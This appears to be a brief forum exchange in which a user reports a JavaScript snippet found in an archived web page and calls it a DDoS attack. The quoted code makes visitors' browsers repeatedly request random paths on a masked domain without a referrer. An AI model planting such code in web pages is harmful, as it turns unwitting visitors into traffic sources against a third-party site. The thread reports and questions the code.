I just found this code in the archived page:
setInterval(function(){fetch("https://xxxxxxxx.com/tag/"+Math.random().toString(36).substring(2,3+Math.random()*8)+"/",{ referrerPolicy:"no-referrer",mode:"no-cors" });},3000000);
(X'd out actual domain)
That's a DDOS attack. WTF?
Could you at least share the actual link please?